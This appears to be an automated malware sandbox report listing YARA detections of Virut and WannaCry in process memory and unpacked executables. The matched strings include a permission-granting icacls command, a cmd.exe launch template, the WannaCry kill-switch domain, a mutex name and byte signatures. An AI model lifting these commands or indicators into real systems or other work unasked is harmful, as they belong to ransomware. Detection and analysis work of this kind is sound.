00000026.00000000.1588816089.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000021.00000002.2718545796.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000026.00000002.2718556376.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000A.00000000.1492508014.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000028.00000002.2718554809.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000F.00000002.2777494761.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000012.00000000.1507806969.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000022.00000002.2777490892.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000017.00000000.1522321273.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001F.00000000.1563869827.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000013.00000002.2718078909.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000009.00000002.2718957847.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000018.00000000.1532350980.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000008.00000000.1472570641.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000007.00000002.2718684916.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000028.00000000.1594553743.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000011.00000000.1507342095.000000000040F000.00000008.00000001.01000000.00000004.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0000001B.00000002.2718378800.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000009.00000002.2719525179.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000C.00000000.1495917347.000000000040F000.00000008.00000001.01000000.00000004.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000029.00000002.2719008114.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000027.00000000.1588961193.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001D.00000002.2718657929.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000020.00000002.2718502180.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000014.00000000.1516012200.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000027.00000002.2720745515.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001A.00000002.2720463440.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000015.00000000.1517859323.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001F.00000002.2718374412.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000013.00000002.2718205451.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000D.00000002.2777847193.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000006.00000002.1710114381.0000000000710000.00000080.00000001.01000000.00000004.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000006.00000002.1710114381.0000000000710000.00000080.00000001.01000000.00000004.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000007.00000002.2719199540.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000008.00000002.2719360325.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000D.00000000.1495914379.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001F.00000002.2718655372.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000028.00000002.2777706559.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000029.00000000.1594740605.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000D.00000002.2719250523.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000022.00000000.1573456651.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000023.00000002.2720028033.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001A.00000000.1546866705.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000009.00000000.1483800032.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000008.00000002.2718814793.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000C.00000002.1693473204.0000000000710000.00000080.00000001.01000000.00000004.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0000000C.00000002.1693473204.0000000000710000.00000080.00000001.01000000.00000004.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0000000C.00000000.1496071117.0000000000710000.00000080.00000001.01000000.00000004.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0000000C.00000000.1496071117.0000000000710000.00000080.00000001.01000000.00000004.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000011.00000002.2279994193.0000000000710000.00000080.00000001.01000000.00000004.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000011.00000002.2279994193.0000000000710000.00000080.00000001.01000000.00000004.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Process Memory Space: mssecsvc.exe PID: 4432	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Process Memory Space: mssecsvc.exe PID: 4432	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: winlogon.exe PID: 556	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: lsass.exe PID: 640	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 744	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: fontdrvhost.exe PID: 776	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: mssecsvc.exe PID: 5568	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Process Memory Space: mssecsvc.exe PID: 5568	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: fontdrvhost.exe PID: 784	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: dllhost.exe PID: 5628	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 868	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 920	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: mssecsvc.exe PID: 1196	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Process Memory Space: mssecsvc.exe PID: 1196	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: dwm.exe PID: 984	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 364	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 372	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 772	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 888	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 660	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1044	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1100	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1200	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1224	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1352	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1392	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1404	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1412	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1476	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1596	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1648	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1704	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1716	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1740	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1800	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 1876	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 2012	JoeSecurity_Virut	Yara detected Virut	Joe Security
Process Memory Space: svchost.exe PID: 2020	JoeSecurity_Virut	Yara detected Virut	Joe Security
Click to see the 159 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
17.2.mssecsvc.exe.24f28c8.8.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
17.2.mssecsvc.exe.1fc7084.4.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
12.2.mssecsvc.exe.7100a4.1.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
12.2.mssecsvc.exe.7100a4.1.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
12.2.mssecsvc.exe.7100a4.1.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
12.2.mssecsvc.exe.7100a4.1.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
12.0.mssecsvc.exe.7100a4.1.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
12.0.mssecsvc.exe.7100a4.1.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
12.0.mssecsvc.exe.7100a4.1.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
12.0.mssecsvc.exe.7100a4.1.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
17.0.mssecsvc.exe.7100a4.1.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
17.0.mssecsvc.exe.7100a4.1.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
17.0.mssecsvc.exe.7100a4.1.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
17.0.mssecsvc.exe.7100a4.1.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
17.2.mssecsvc.exe.7100a4.1.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
17.2.mssecsvc.exe.7100a4.1.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
17.2.mssecsvc.exe.7100a4.1.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
17.2.mssecsvc.exe.7100a4.1.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
6.0.mssecsvc.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
6.0.mssecsvc.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x4157c:$x3: tasksche.exe 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA 0x415d0:$x5: WNcry@2ol7 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x414d0:$s3: cmd.exe /c "%s" 0x73a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x34780:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x3436c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
6.0.mssecsvc.exe.400000.0.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
6.0.mssecsvc.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
17.2.mssecsvc.exe.1ff9128.3.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
17.2.mssecsvc.exe.1ff9128.3.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
17.2.mssecsvc.exe.1ff9128.3.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
17.2.mssecsvc.exe.1ff9128.3.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
17.0.mssecsvc.exe.7100a4.1.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
17.0.mssecsvc.exe.7100a4.1.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
17.0.mssecsvc.exe.7100a4.1.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
